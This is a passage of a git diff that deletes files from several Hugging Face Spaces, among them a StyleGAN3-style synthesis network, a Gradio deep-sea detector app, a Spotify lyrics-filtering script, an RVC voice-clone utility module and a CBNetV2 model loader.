self.size = np.broadcast_to(np.asarray(size), [2]) - else: - self.size = np.array([size // 2, size]) # [width, height] - self.sampling_rate = sampling_rate - self.bandwidth = bandwidth - - # Draw random frequencies from uniform 2D disc. - freqs = torch.randn([self.channels, 2]) - radii = freqs.square().sum(dim=1, keepdim=True).sqrt() - freqs /= radii * radii.square().exp().pow(0.25) - freqs *= bandwidth - phases = torch.rand([self.channels]) - 0.5 - - # Setup parameters and buffers. - self.weight = torch.nn.Parameter(torch.randn([self.channels, self.channels])) - self.affine = FullyConnectedLayer(w_dim, 4, weight_init=0, bias_init=[1,0,0,0]) - self.register_buffer('transform', torch.eye(3, 3)) # User-specified inverse transform wrt. resulting image. - self.register_buffer('freqs', freqs) - self.register_buffer('phases', phases) - - def forward(self, w): - # Introduce batch dimension. - transforms = self.transform.unsqueeze(0) # [batch, row, col] - freqs = self.freqs.unsqueeze(0) # [batch, channel, xy] - phases = self.phases.unsqueeze(0) # [batch, channel] - - # Apply learned transformation. - t = self.affine(w) # t = (r_c, r_s, t_x, t_y) - t = t / t[:, :2].norm(dim=1, keepdim=True) # t' = (r'_c, r'_s, t'_x, t'_y) - m_r = torch.eye(3, device=w.device).unsqueeze(0).repeat([w.shape[0], 1, 1]) # Inverse rotation wrt. resulting image. - m_r[:, 0, 0] = t[:, 0] # r'_c - m_r[:, 0, 1] = -t[:, 1] # r'_s - m_r[:, 1, 0] = t[:, 1] # r'_s - m_r[:, 1, 1] = t[:, 0] # r'_c - m_t = torch.eye(3, device=w.device).unsqueeze(0).repeat([w.shape[0], 1, 1]) # Inverse translation wrt. resulting image. - m_t[:, 0, 2] = -t[:, 2] # t'_x - m_t[:, 1, 2] = -t[:, 3] # t'_y - transforms = m_r @ m_t @ transforms # First rotate resulting image, then translate, and finally apply user-specified transform. - - # Transform frequencies. - phases = phases + (freqs @ transforms[:, :2, 2:]).squeeze(2) - freqs = freqs @ transforms[:, :2, :2] - - # Dampen out-of-band frequencies that may occur due to the user-specified transform. - amplitudes = (1 - (freqs.norm(dim=2) - self.bandwidth) / (self.sampling_rate / 2 - self.bandwidth)).clamp(0, 1) - - # Construct sampling grid. - theta = torch.eye(2, 3, device=w.device) - theta[0, 0] = 0.5 * self.size[0] / self.sampling_rate - theta[1, 1] = 0.5 * self.size[1] / self.sampling_rate - grids = torch.nn.functional.affine_grid(theta.unsqueeze(0), [1, 1, self.size[1], self.size[0]], align_corners=False) - - # Compute Fourier features. - x = (grids.unsqueeze(3) @ freqs.permute(0, 2, 1).unsqueeze(1).unsqueeze(2)).squeeze(3) # [batch, height, width, channel] - x = x + phases.unsqueeze(1).unsqueeze(2) - x = torch.sin(x * (np.pi * 2)) - x = x * amplitudes.unsqueeze(1).unsqueeze(2) - - # Apply trainable mapping. - weight = self.weight / np.sqrt(self.channels) - x = x @ weight.t() - - # Ensure correct shape. - x = x.permute(0, 3, 1, 2) # [batch, channel, height, width] - misc.assert_shape(x, [w.shape[0], self.channels, int(self.size[1]), int(self.size[0])]) - return x - - def extra_repr(self): - return '\n'.join([ - f'w_dim={self.w_dim:d}, channels={self.channels:d}, size={list(self.size)},', - f'sampling_rate={self.sampling_rate:g}, bandwidth={self.bandwidth:g}']) - -#---------------------------------------------------------------------------- - -@persistence.persistent_class -class SynthesisLayer(torch.nn.Module): - def __init__(self, - w_dim, # Intermediate latent (W) dimensionality. - is_torgb, # Is this the final ToRGB layer? - is_critically_sampled, # Does this layer use critical sampling? - use_fp16, # Does this layer use FP16? - - # Input & output specifications. - in_channels, # Number of input channels. - out_channels, # Number of output channels. - in_size, # Input spatial size: int or [width, height]. - out_size, # Output spatial size: int or [width, height]. - in_sampling_rate, # Input sampling rate (s). - out_sampling_rate, # Output sampling rate (s). - in_cutoff, # Input cutoff frequency (f_c). - out_cutoff, # Output cutoff frequency (f_c). - in_half_width, # Input transition band half-width (f_h). - out_half_width, # Output Transition band half-width (f_h). - - # Hyperparameters. - conv_kernel = 3, # Convolution kernel size. Ignored for final the ToRGB layer. - filter_size = 6, # Low-pass filter size relative to the lower resolution when up/downsampling. - lrelu_upsampling = 2, # Relative sampling rate for leaky ReLU. Ignored for final the ToRGB layer. - use_radial_filters = False, # Use radially symmetric downsampling filter? Ignored for critically sampled layers. - conv_clamp = 256, # Clamp the output to [-X, +X], None = disable clamping. - magnitude_ema_beta = 0.999, # Decay rate for the moving average of input magnitudes. - square = False, # default if for rectangle images - ): - super().__init__() - self.w_dim = w_dim - self.is_torgb = is_torgb - self.is_critically_sampled = is_critically_sampled - self.use_fp16 = use_fp16 - self.in_channels = in_channels - self.out_channels = out_channels - self.square = square - if self.square: - self.in_size = np.broadcast_to(np.asarray(in_size), [2]) - self.out_size = np.broadcast_to(np.asarray(out_size), [2]) - else: - # self.in_size = np.array[in_size, in_size//2] - self.in_size = np.array([in_size // 2, in_size]) - # self.out_size = np.array[out_size, out_size//2] - self.out_size = np.array([out_size // 2, out_size]) - self.in_sampling_rate = in_sampling_rate - self.out_sampling_rate = out_sampling_rate - self.tmp_sampling_rate = max(in_sampling_rate, out_sampling_rate) * (1 if is_torgb else lrelu_upsampling) - self.in_cutoff = in_cutoff - self.out_cutoff = out_cutoff - self.in_half_width = in_half_width - self.out_half_width = out_half_width - self.conv_kernel = 1 if is_torgb else conv_kernel - self.conv_clamp = conv_clamp - self.magnitude_ema_beta = magnitude_ema_beta - - # Setup parameters and buffers. - self.affine = FullyConnectedLayer(self.w_dim, self.in_channels, bias_init=1) - self.weight = torch.nn.Parameter(torch.randn([self.out_channels, self.in_channels, self.conv_kernel, self.conv_kernel])) - self.bias = torch.nn.Parameter(torch.zeros([self.out_channels])) - self.register_buffer('magnitude_ema', torch.ones([])) - - # Design upsampling filter. - self.up_factor = int(np.rint(self.tmp_sampling_rate / self.in_sampling_rate)) - assert self.in_sampling_rate * self.up_factor == self.tmp_sampling_rate - self.up_taps = filter_size * self.up_factor if self.up_factor > 1 and not self.is_torgb else 1 - self.register_buffer('up_filter', self.design_lowpass_filter( - numtaps=self.up_taps, cutoff=self.in_cutoff, width=self.in_half_width*2, fs=self.tmp_sampling_rate)) - - # Design downsampling filter. - self.down_factor = int(np.rint(self.tmp_sampling_rate / self.out_sampling_rate)) - assert self.out_sampling_rate * self.down_factor == self.tmp_sampling_rate - self.down_taps = filter_size * self.down_factor if self.down_factor > 1 and not self.is_torgb else 1 - self.down_radial = use_radial_filters and not self.is_critically_sampled - self.register_buffer('down_filter', self.design_lowpass_filter( - numtaps=self.down_taps, cutoff=self.out_cutoff, width=self.out_half_width*2, fs=self.tmp_sampling_rate, radial=self.down_radial)) - - # Compute padding. - pad_total = (self.out_size - 1) * self.down_factor + 1 # Desired output size before downsampling. - pad_total -= (self.in_size + self.conv_kernel - 1) * self.up_factor # Input size after upsampling. - pad_total += self.up_taps + self.down_taps - 2 # Size reduction caused by the filters. - pad_lo = (pad_total + self.up_factor) // 2 # Shift sample locations according to the symmetric interpretation (Appendix C.3). - pad_hi = pad_total - pad_lo - self.padding = [int(pad_lo[0]), int(pad_hi[0]), int(pad_lo[1]), int(pad_hi[1])] - - def forward(self, x, w, noise_mode='random', force_fp32=False, update_emas=False): - assert noise_mode in ['random', 'const', 'none'] # unused - misc.assert_shape(x, [None, self.in_channels, int(self.in_size[1]), int(self.in_size[0])]) - misc.assert_shape(w, [x.shape[0], self.w_dim]) - - # Track input magnitude. - if update_emas: - with torch.autograd.profiler.record_function('update_magnitude_ema'): - magnitude_cur = x.detach().to(torch.float32).square().mean() - self.magnitude_ema.copy_(magnitude_cur.lerp(self.magnitude_ema, self.magnitude_ema_beta)) - input_gain = self.magnitude_ema.rsqrt() - - # Execute affine layer. - styles = self.affine(w) - if self.is_torgb: - weight_gain = 1 / np.sqrt(self.in_channels * (self.conv_kernel ** 2)) - styles = styles * weight_gain - - # Execute modulated conv2d. - dtype = torch.float16 if (self.use_fp16 and not force_fp32 and x.device.type == 'cuda') else torch.float32 - x = modulated_conv2d(x=x.to(dtype), w=self.weight, s=styles, - padding=self.conv_kernel-1, demodulate=(not self.is_torgb), input_gain=input_gain) - - # Execute bias, filtered leaky ReLU, and clamping. - gain = 1 if self.is_torgb else np.sqrt(2) - slope = 1 if self.is_torgb else 0.2 - x = filtered_lrelu.filtered_lrelu(x=x, fu=self.up_filter, fd=self.down_filter, b=self.bias.to(x.dtype), - up=self.up_factor, down=self.down_factor, padding=self.padding, gain=gain, slope=slope, clamp=self.conv_clamp) - - # Ensure correct shape and dtype. - misc.assert_shape(x, [None, self.out_channels, int(self.out_size[1]), int(self.out_size[0])]) - assert x.dtype == dtype - return x - - @staticmethod - def design_lowpass_filter(numtaps, cutoff, width, fs, radial=False): - assert numtaps >= 1 - - # Identity filter. - if numtaps == 1: - return None - - # Separable Kaiser low-pass filter. - if not radial: - f = scipy.signal.firwin(numtaps=numtaps, cutoff=cutoff, width=width, fs=fs) - return torch.as_tensor(f, dtype=torch.float32) - - # Radially symmetric jinc-based filter. - x = (np.arange(numtaps) - (numtaps - 1) / 2) / fs - r = np.hypot(*np.meshgrid(x, x)) - f = scipy.special.j1(2 * cutoff * (np.pi * r)) / (np.pi * r) - beta = scipy.signal.kaiser_beta(scipy.signal.kaiser_atten(numtaps, width / (fs / 2))) - w = np.kaiser(numtaps, beta) - f *= np.outer(w, w) - f /= np.sum(f) - return torch.as_tensor(f, dtype=torch.float32) - - def extra_repr(self): - return '\n'.join([ - f'w_dim={self.w_dim:d}, is_torgb={self.is_torgb},', - f'is_critically_sampled={self.is_critically_sampled}, use_fp16={self.use_fp16},', - f'in_sampling_rate={self.in_sampling_rate:g}, out_sampling_rate={self.out_sampling_rate:g},', - f'in_cutoff={self.in_cutoff:g}, out_cutoff={self.out_cutoff:g},', - f'in_half_width={self.in_half_width:g}, out_half_width={self.out_half_width:g},', - f'in_size={list(self.in_size)}, out_size={list(self.out_size)},', - f'in_channels={self.in_channels:d}, out_channels={self.out_channels:d}']) - -#---------------------------------------------------------------------------- - -@persistence.persistent_class -class SynthesisNetwork(torch.nn.Module): - def __init__(self, - w_dim, # Intermediate latent (W) dimensionality. - img_resolution, # Output image resolution. - img_channels, # Number of color channels. - square, - channel_base = 32768, # Overall multiplier for the number of channels. - channel_max = 512, # Maximum number of channels in any layer. - num_layers = 14, # Total number of layers, excluding Fourier features and ToRGB. - num_critical = 2, # Number of critically sampled layers at the end. - first_cutoff = 2, # Cutoff frequency of the first layer (f_{c,0}). - first_stopband = 2**2.1, # Minimum stopband of the first layer (f_{t,0}). - last_stopband_rel = 2**0.3, # Minimum stopband of the last layer, expressed relative to the cutoff. - margin_size = 10, # Number of additional pixels outside the image. - output_scale = 0.25, # Scale factor for the output image. - num_fp16_res = 4, # Use FP16 for the N highest resolutions. - **layer_kwargs, # Arguments for SynthesisLayer. - - ): - super().__init__() - self.w_dim = w_dim - self.num_ws = num_layers + 2 - self.img_resolution = img_resolution - self.img_channels = img_channels - self.num_layers = num_layers - self.num_critical = num_critical - self.margin_size = margin_size - self.output_scale = output_scale - self.num_fp16_res = num_fp16_res - self.square = square - - # Geometric progression of layer cutoffs and min. stopbands. - last_cutoff = self.img_resolution / 2 # f_{c,N} - last_stopband = last_cutoff * last_stopband_rel # f_{t,N} - exponents = np.minimum(np.arange(self.num_layers + 1) / (self.num_layers - self.num_critical), 1) - cutoffs = first_cutoff * (last_cutoff / first_cutoff) ** exponents # f_c[i] - stopbands = first_stopband * (last_stopband / first_stopband) ** exponents # f_t[i] - - # Compute remaining layer parameters. - sampling_rates = np.exp2(np.ceil(np.log2(np.minimum(stopbands * 2, self.img_resolution)))) # s[i] - half_widths = np.maximum(stopbands, sampling_rates / 2) - cutoffs # f_h[i] - sizes = sampling_rates + self.margin_size * 2 - sizes[-2:] = self.img_resolution - channels = np.rint(np.minimum((channel_base / 2) / cutoffs, channel_max)) - channels[-1] = self.img_channels - - # Construct layers. - self.input = SynthesisInput( - w_dim=self.w_dim, channels=int(channels[0]), size=int(sizes[0]), - sampling_rate=sampling_rates[0], bandwidth=cutoffs[0], square=self.square) - self.layer_names = [] - for idx in range(self.num_layers + 1): - prev = max(idx - 1, 0) - is_torgb = (idx == self.num_layers) - is_critically_sampled = (idx >= self.num_layers - self.num_critical) - use_fp16 = (sampling_rates[idx] * (2 ** self.num_fp16_res) > self.img_resolution) - layer = SynthesisLayer( - w_dim=self.w_dim, is_torgb=is_torgb, is_critically_sampled=is_critically_sampled, use_fp16=use_fp16, - in_channels=int(channels[prev]), out_channels= int(channels[idx]), - in_size=int(sizes[prev]), out_size=int(sizes[idx]), - in_sampling_rate=int(sampling_rates[prev]), out_sampling_rate=int(sampling_rates[idx]), - in_cutoff=cutoffs[prev], out_cutoff=cutoffs[idx], - in_half_width=half_widths[prev], out_half_width=half_widths[idx], - square=self.square, - **layer_kwargs) - name = f'L{idx}_{layer.out_size[0]}_{layer.out_channels}' - setattr(self, name, layer) - self.layer_names.append(name) - - def forward(self, ws, **layer_kwargs): - misc.assert_shape(ws, [None, self.num_ws, self.w_dim]) - ws = ws.to(torch.float32).unbind(dim=1) - - # Execute layers. - x = self.input(ws[0]) - for name, w in zip(self.layer_names, ws[1:]): - x = getattr(self, name)(x, w, **layer_kwargs) - if self.output_scale != 1: - x = x * self.output_scale - - # Ensure correct shape and dtype. - if self.square: - misc.assert_shape(x, [None, self.img_channels, self.img_resolution, self.img_resolution]) - else: - misc.assert_shape(x, [None, self.img_channels, self.img_resolution, self.img_resolution // 2]) - x = x.to(torch.float32) - return x - - def extra_repr(self): - return '\n'.join([ - f'w_dim={self.w_dim:d}, num_ws={self.num_ws:d},', - f'img_resolution={self.img_resolution:d}, img_channels={self.img_channels:d},', - f'num_layers={self.num_layers:d}, num_critical={self.num_critical:d},', - f'margin_size={self.margin_size:d}, num_fp16_res={self.num_fp16_res:d}']) - -#---------------------------------------------------------------------------- - -@persistence.persistent_class -class Generator(torch.nn.Module): - def __init__(self, - z_dim, # Input latent (Z) dimensionality. - c_dim, # Conditioning label (C) dimensionality. - w_dim, # Intermediate latent (W) dimensionality. - img_resolution, # Output resolution. - square, - img_channels, # Number of output color channels. - mapping_kwargs = {}, # Arguments for MappingNetwork. - **synthesis_kwargs, # Arguments for SynthesisNetwork. - ): - super().__init__() - self.z_dim = z_dim - self.c_dim = c_dim - self.w_dim = w_dim - self.img_resolution = img_resolution - self.img_channels = img_channels - self.square = square - self.synthesis = SynthesisNetwork(w_dim=w_dim, img_resolution=img_resolution, img_channels=img_channels, square=self.square, **synthesis_kwargs) - self.num_ws = self.synthesis.num_ws - self.mapping = MappingNetwork(z_dim=z_dim, c_dim=c_dim, w_dim=w_dim, num_ws=self.num_ws, **mapping_kwargs) - - def forward(self, z, c, truncation_psi=1, truncation_cutoff=None, update_emas=False, **synthesis_kwargs): - ws = self.mapping(z, c, truncation_psi=truncation_psi, truncation_cutoff=truncation_cutoff, update_emas=update_emas) - img = self.synthesis(ws, update_emas=update_emas, **synthesis_kwargs) - return img - -#---------------------------------------------------------------------------- diff --git a/spaces/FathomNet/UWROV_Deepsea_Detector/app.py b/spaces/FathomNet/UWROV_Deepsea_Detector/app.py deleted file mode 100644 index 43c4a41f65adc5e1d82edbddca2237b0a63081fa..0000000000000000000000000000000000000000 --- a/spaces/FathomNet/UWROV_Deepsea_Detector/app.py +++ /dev/null @@ -1,38 +0,0 @@ -import glob -import gradio as gr -from inference import * -from PIL import Image - - -def gradio_app(image_path): - """A function that send the file to the inference pipeline, and filters - some predictions before outputting to gradio interface.""" - - predictions = run_inference(image_path) - - out_img = Image.fromarray(predictions.render()[0]) - - return out_img - - -title = "UWROV Deepsea Detector" -description = "Gradio demo for UWROV Deepsea Detector: Developed by Peyton " \ - "Lee, Neha Nagvekar, and Cassandra Lam as part of the " \ - "Underwater Remotely Operated Vehicles Team (UWROV) at the " \ - "University of Washington. Deepsea Detector is built on " \ - "MBARI's Monterey Bay Benthic Object Detector, which can also " \ - "be found in FathomNet's Model Zoo. The model is trained on " \ - "data from NOAA Ocean Exploration and FathomNet, " \ - "with assistance from WoRMS for organism classification. All " \ - "the images and associated annotations we used can be found in " \ - "our Roboflow project. " - -examples = glob.glob("images/*.png") - -gr.Interface(gradio_app, - inputs=[gr.inputs.Image(type="filepath")], - outputs=gr.outputs.Image(type="pil"), - enable_queue=True, - title=title, - description=description, - examples=examples).launch() \ No newline at end of file diff --git a/spaces/Fernando22/freegpt-webui/client/css/stop-generating.css b/spaces/Fernando22/freegpt-webui/client/css/stop-generating.css deleted file mode 100644 index 3c2010d25065fbef63b104df743ef72c00259871..0000000000000000000000000000000000000000 --- a/spaces/Fernando22/freegpt-webui/client/css/stop-generating.css +++ /dev/null @@ -1,38 +0,0 @@ -.stop-generating { - position: absolute; - bottom: 128px; - left: 50%; - transform: translateX(-50%); - z-index: 1000000; -} - -.stop-generating button { - backdrop-filter: blur(20px); - -webkit-backdrop-filter: blur(20px); - background-color: var(--blur-bg); - color: var(--colour-3); - cursor: pointer; - animation: show_popup 0.4s; -} - -@keyframes show_popup { - from { - opacity: 0; - transform: translateY(10px); - } -} - -@keyframes hide_popup { - to { - opacity: 0; - transform: translateY(10px); - } -} - -.stop-generating-hiding button { - animation: hide_popup 0.4s; -} - -.stop-generating-hidden button { - display: none; -} diff --git a/spaces/Francesco/FairytaleDJ/scripts/keep_only_lyrics_on_spotify.py b/spaces/Francesco/FairytaleDJ/scripts/keep_only_lyrics_on_spotify.py deleted file mode 100644 index fc0e4a54c13bf2a8e657afa53d9166bb4c2b7342..0000000000000000000000000000000000000000 --- a/spaces/Francesco/FairytaleDJ/scripts/keep_only_lyrics_on_spotify.py +++ /dev/null @@ -1,51 +0,0 @@ -""" -This script will keep only the songs that are in the Spotify "Disney Hits" playlist -""" -from dotenv import load_dotenv - -load_dotenv() -import json -from collections import defaultdict - -import spotipy -from spotipy.oauth2 import SpotifyClientCredentials - -name = "Disney hits" - -spotify = spotipy.Spotify(auth_manager=SpotifyClientCredentials()) -results = spotify.search(q="playlist:" + name, type="playlist", limit=5) -items = results["playlists"]["items"] - -uri = "spotify:playlist:37i9dQZF1DX8C9xQcOrE6T" -playlist = spotify.playlist(uri) - -with open("data/lyrics.json", "r") as f: - data = json.load(f) - -spotify_tracks = {} - -for item in playlist["tracks"]["items"]: - track = item["track"] - track_name = track["name"].lower().split("-")[0].strip() - print(track_name) - spotify_tracks[track_name] = { - "id": track["id"], - "embed_url": f"https://open.spotify.com/embed/track/{track['id']}?utm_source=generator", - } - -# here we add only songs that are in the Disney spotify playlist - -data_filtered = defaultdict(list) -tot = 0 -for movie, lyrics in data.items(): - for lyric in lyrics: - name = lyric["name"].lower() - if name in spotify_tracks: - data_filtered[movie].append( - {**lyric, **{"embed_url": spotify_tracks[name]["embed_url"]}} - ) - tot += 1 -print(tot) - -with open("data/lyrics_with_spotify_url.json", "w") as f: - json.dump(data_filtered, f) diff --git a/spaces/Fu-chiang/skintest/README.md b/spaces/Fu-chiang/skintest/README.md deleted file mode 100644 index e4df640850ff6edeaf25c715092ad032ee05fc1f..0000000000000000000000000000000000000000 --- a/spaces/Fu-chiang/skintest/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Skintest -emoji: 📉 -colorFrom: gray -colorTo: green -sdk: gradio -sdk_version: 3.47.1 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/GIZ/SDSN-demo/appStore/__init__.py b/spaces/GIZ/SDSN-demo/appStore/__init__.py deleted file mode 100644 index 07c25e5348471a19c24ca6468ee403b472c68906..0000000000000000000000000000000000000000 --- a/spaces/GIZ/SDSN-demo/appStore/__init__.py +++ /dev/null @@ -1 +0,0 @@ -# creating appstore package \ No newline at end of file diff --git a/spaces/Goutam982/RVC_V2_voice_clone/lib/infer_pack/commons.py b/spaces/Goutam982/RVC_V2_voice_clone/lib/infer_pack/commons.py deleted file mode 100644 index 54470986f37825b35d90d7efa7437d1c26b87215..0000000000000000000000000000000000000000 --- a/spaces/Goutam982/RVC_V2_voice_clone/lib/infer_pack/commons.py +++ /dev/null @@ -1,166 +0,0 @@ -import math -import numpy as np -import torch -from torch import nn -from torch.nn import functional as F - - -def init_weights(m, mean=0.0, std=0.01): - classname = m.__class__.__name__ - if classname.find("Conv") != -1: - m.weight.data.normal_(mean, std) - - -def get_padding(kernel_size, dilation=1): - return int((kernel_size * dilation - dilation) / 2) - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def kl_divergence(m_p, logs_p, m_q, logs_q): - """KL(P||Q)""" - kl = (logs_q - logs_p) - 0.5 - kl += ( - 0.5 * (torch.exp(2.0 * logs_p) + ((m_p - m_q) ** 2)) * torch.exp(-2.0 * logs_q) - ) - return kl - - -def rand_gumbel(shape): - """Sample from the Gumbel distribution, protect from overflows.""" - uniform_samples = torch.rand(shape) * 0.99998 + 0.00001 - return -torch.log(-torch.log(uniform_samples)) - - -def rand_gumbel_like(x): - g = rand_gumbel(x.size()).to(dtype=x.dtype, device=x.device) - return g - - -def slice_segments(x, ids_str, segment_size=4): - ret = torch.zeros_like(x[:, :, :segment_size]) - for i in range(x.size(0)): - idx_str = ids_str[i] - idx_end = idx_str + segment_size - ret[i] = x[i, :, idx_str:idx_end] - return ret - - -def slice_segments2(x, ids_str, segment_size=4): - ret = torch.zeros_like(x[:, :segment_size]) - for i in range(x.size(0)): - idx_str = ids_str[i] - idx_end = idx_str + segment_size - ret[i] = x[i, idx_str:idx_end] - return ret - - -def rand_slice_segments(x, x_lengths=None, segment_size=4): - b, d, t = x.size() - if x_lengths is None: - x_lengths = t - ids_str_max = x_lengths - segment_size + 1 - ids_str = (torch.rand([b]).to(device=x.device) * ids_str_max).to(dtype=torch.long) - ret = slice_segments(x, ids_str, segment_size) - return ret, ids_str - - -def get_timing_signal_1d(length, channels, min_timescale=1.0, max_timescale=1.0e4): - position = torch.arange(length, dtype=torch.float) - num_timescales = channels // 2 - log_timescale_increment = math.log(float(max_timescale) / float(min_timescale)) / ( - num_timescales - 1 - ) - inv_timescales = min_timescale * torch.exp( - torch.arange(num_timescales, dtype=torch.float) * -log_timescale_increment - ) - scaled_time = position.unsqueeze(0) * inv_timescales.unsqueeze(1) - signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)], 0) - signal = F.pad(signal, [0, 0, 0, channels % 2]) - signal = signal.view(1, channels, length) - return signal - - -def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return x + signal.to(dtype=x.dtype, device=x.device) - - -def cat_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4, axis=1): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return torch.cat([x, signal.to(dtype=x.dtype, device=x.device)], axis) - - -def subsequent_mask(length): - mask = torch.tril(torch.ones(length, length)).unsqueeze(0).unsqueeze(0) - return mask - - -@torch.jit.script -def fused_add_tanh_sigmoid_multiply(input_a, input_b, n_channels): - n_channels_int = n_channels[0] - in_act = input_a + input_b - t_act = torch.tanh(in_act[:, :n_channels_int, :]) - s_act = torch.sigmoid(in_act[:, n_channels_int:, :]) - acts = t_act * s_act - return acts - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def shift_1d(x): - x = F.pad(x, convert_pad_shape([[0, 0], [0, 0], [1, 0]]))[:, :, :-1] - return x - - -def sequence_mask(length, max_length=None): - if max_length is None: - max_length = length.max() - x = torch.arange(max_length, dtype=length.dtype, device=length.device) - return x.unsqueeze(0) < length.unsqueeze(1) - - -def generate_path(duration, mask): - """ - duration: [b, 1, t_x] - mask: [b, 1, t_y, t_x] - """ - device = duration.device - - b, _, t_y, t_x = mask.shape - cum_duration = torch.cumsum(duration, -1) - - cum_duration_flat = cum_duration.view(b * t_x) - path = sequence_mask(cum_duration_flat, t_y).to(mask.dtype) - path = path.view(b, t_x, t_y) - path = path - F.pad(path, convert_pad_shape([[0, 0], [1, 0], [0, 0]]))[:, :-1] - path = path.unsqueeze(1).transpose(2, 3) * mask - return path - - -def clip_grad_value_(parameters, clip_value, norm_type=2): - if isinstance(parameters, torch.Tensor): - parameters = [parameters] - parameters = list(filter(lambda p: p.grad is not None, parameters)) - norm_type = float(norm_type) - if clip_value is not None: - clip_value = float(clip_value) - - total_norm = 0 - for p in parameters: - param_norm = p.grad.data.norm(norm_type) - total_norm += param_norm.item() ** norm_type - if clip_value is not None: - p.grad.data.clamp_(min=-clip_value, max=clip_value) - total_norm = total_norm ** (1.0 / norm_type) - return total_norm diff --git a/spaces/Gradio-Blocks/CBNetV2/model.py b/spaces/Gradio-Blocks/CBNetV2/model.py deleted file mode 100644 index 7a7db3c162ace926fd58a63c4a84b8d0f6855ac8..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/CBNetV2/model.py +++ /dev/null @@ -1,143 +0,0 @@ -from __future__ import annotations - -import os -import pathlib -import shlex -import subprocess -import sys - -if os.getenv('SYSTEM') == 'spaces': - import mim - - mim.uninstall('mmcv-full', confirm_yes=True) - mim.install('mmcv-full==1.5.0', is_yes=True) - - subprocess.run(shlex.split('pip uninstall -y opencv-python')) - subprocess.run(shlex.split('pip uninstall -y opencv-python-headless')) - subprocess.run(shlex.split('pip install opencv-python-headless==4.8.0.74')) - - with open('patch') as f: - subprocess.run(shlex.split('patch -p1'), cwd='CBNetV2', stdin=f) - subprocess.run('mv palette.py CBNetV2/mmdet/core/visualization/'.split()) - -import numpy as np -import torch -import torch.nn as nn - -app_dir = pathlib.Path(__file__).parent -submodule_dir = app_dir / 'CBNetV2/' -sys.path.insert(0, submodule_dir.as_posix()) - -from mmdet.apis import inference_detector, init_detector - - -class Model: - def __init__(self): - self.device = torch.device( - 'cuda:0' if torch.cuda.is_available() else 'cpu') - self.models = self._load_models() - self.model_name = 'Improved HTC (DB-Swin-B)' - - def _load_models(self) -> dict[str, nn.Module]: - model_dict = { - 'Faster R-CNN (DB-ResNet50)': { - 'config': - 'CBNetV2/configs/cbnet/faster_rcnn_cbv2d1_r50_fpn_1x_coco.py', - 'model': - 'https://github.com/CBNetwork/storage/releases/download/v1.0.0/faster_rcnn_cbv2d1_r50_fpn_1x_coco.pth.zip', - }, - 'Mask R-CNN (DB-Swin-T)': { - 'config': - 'CBNetV2/configs/cbnet/mask_rcnn_cbv2_swin_tiny_patch4_window7_mstrain_480-800_adamw_3x_coco.py', - 'model': - 'https://github.com/CBNetwork/storage/releases/download/v1.0.0/mask_rcnn_cbv2_swin_tiny_patch4_window7_mstrain_480-800_adamw_3x_coco.pth.zip', - }, - # 'Cascade Mask R-CNN (DB-Swin-S)': { - # 'config': - # 'CBNetV2/configs/cbnet/cascade_mask_rcnn_cbv2_swin_small_patch4_window7_mstrain_400-1400_adamw_3x_coco.py', - # 'model': - # 'https://github.com/CBNetwork/storage/releases/download/v1.0.0/cascade_mask_rcnn_cbv2_swin_small_patch4_window7_mstrain_400-1400_adamw_3x_coco.pth.zip', - # }, - 'Improved HTC (DB-Swin-B)': { - 'config': - 'CBNetV2/configs/cbnet/htc_cbv2_swin_base_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco.py', - 'model': - 'https://github.com/CBNetwork/storage/releases/download/v1.0.0/htc_cbv2_swin_base22k_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco.pth.zip', - }, - 'Improved HTC (DB-Swin-L)': { - 'config': - 'CBNetV2/configs/cbnet/htc_cbv2_swin_large_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_1x_coco.py', - 'model': - 'https://github.com/CBNetwork/storage/releases/download/v1.0.0/htc_cbv2_swin_large22k_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_1x_coco.pth.zip', - }, - 'Improved HTC (DB-Swin-L (TTA))': { - 'config': - 'CBNetV2/configs/cbnet/htc_cbv2_swin_large_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_1x_coco.py', - 'model': - 'https://github.com/CBNetwork/storage/releases/download/v1.0.0/htc_cbv2_swin_large22k_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_1x_coco.pth.zip', - }, - } - - weight_dir = pathlib.Path('weights') - weight_dir.mkdir(exist_ok=True) - - def _download(model_name: str, out_dir: pathlib.Path) -> None: - import zipfile - - model_url = model_dict[model_name]['model'] - zip_name = model_url.split('/')[-1] - - out_path = out_dir / zip_name - if out_path.exists(): - return - torch.hub.download_url_to_file(model_url, out_path) - - with zipfile.ZipFile(out_path) as f: - f.extractall(out_dir) - - def _get_model_path(model_name: str) -> str: - model_url = model_dict[model_name]['model'] - model_name = model_url.split('/')[-1][:-4] - return (weight_dir / model_name).as_posix() - - for model_name in model_dict: - _download(model_name, weight_dir) - - models = { - key: init_detector(dic['config'], - _get_model_path(key), - device=self.device) - for key, dic in model_dict.items() - } - return models - - def set_model_name(self, name: str) -> None: - self.model_name = name - - def detect_and_visualize( - self, image: np.ndarray, - score_threshold: float) -> tuple[list[np.ndarray], np.ndarray]: - out = self.detect(image) - vis = self.visualize_detection_results(image, out, score_threshold) - return out, vis - - def detect(self, image: np.ndarray) -> list[np.ndarray]: - image = image[:, :, ::-1] # RGB -> BGR - model = self.models[self.model_name] - out = inference_detector(model, image) - return out - - def visualize_detection_results( - self, - image: np.ndarray, - detection_results: list[np.ndarray], - score_threshold: float = 0.3) -> np.ndarray: - image = image[:, :, ::-1] # RGB -> BGR - model = self.models[self.model_name] - vis = model.show_result(image, - detection_results, - score_thr=score_threshold, - bbox_color=None, - text_color=(200, 200, 200), - 